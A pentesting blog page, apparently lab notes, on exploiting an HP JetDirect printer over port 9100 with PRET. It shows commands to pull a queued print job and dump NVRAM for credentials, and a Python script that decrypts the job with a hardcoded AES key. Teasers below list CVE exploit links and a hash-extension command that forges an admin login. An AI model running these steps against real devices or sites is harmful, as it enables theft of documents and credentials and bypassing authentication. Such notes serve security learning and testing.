Skip to main content

Pentesting Printers

By

 

HP Jet Direct Exploit - Port 9100

git clone https://github.com/RUB-NDS/PRET.git

./pret.py 10.10.10.201 pjl

go to queued file and download it . get queued

nvram dump        #Ram Dump for creds
sed -e "s#’##g" queued | cut -c2- > queued.b64
cat queued.b64 | base64 -d > somefile.raw


decrypt_printer_queue.py


import io, sys, base64
from Crypto.Cipher import AES

with io.open('somefile.raw', 'rb') as fp:
        c = fp.read()[8:]
        iv, ct = c[:16], c[16:]
cipher = AES.new('13vu94r6643rv19u', AES.MODE_CBC, iv)
z = cipher.decrypt(ct)
sys.stdout.buffer.write(z)


python3 decrypt_printer_queue.py > newfile

file newfile
newfile: PDF document, version 1.4

mv newfile newfile.pdf



 

Labels:

Comments

Post a Comment

Popular posts from this blog

POC Links for CVE's

By
  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main
Post a Comment
Read more

Hash Extension Attacks

By
  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512
Post a Comment
Read more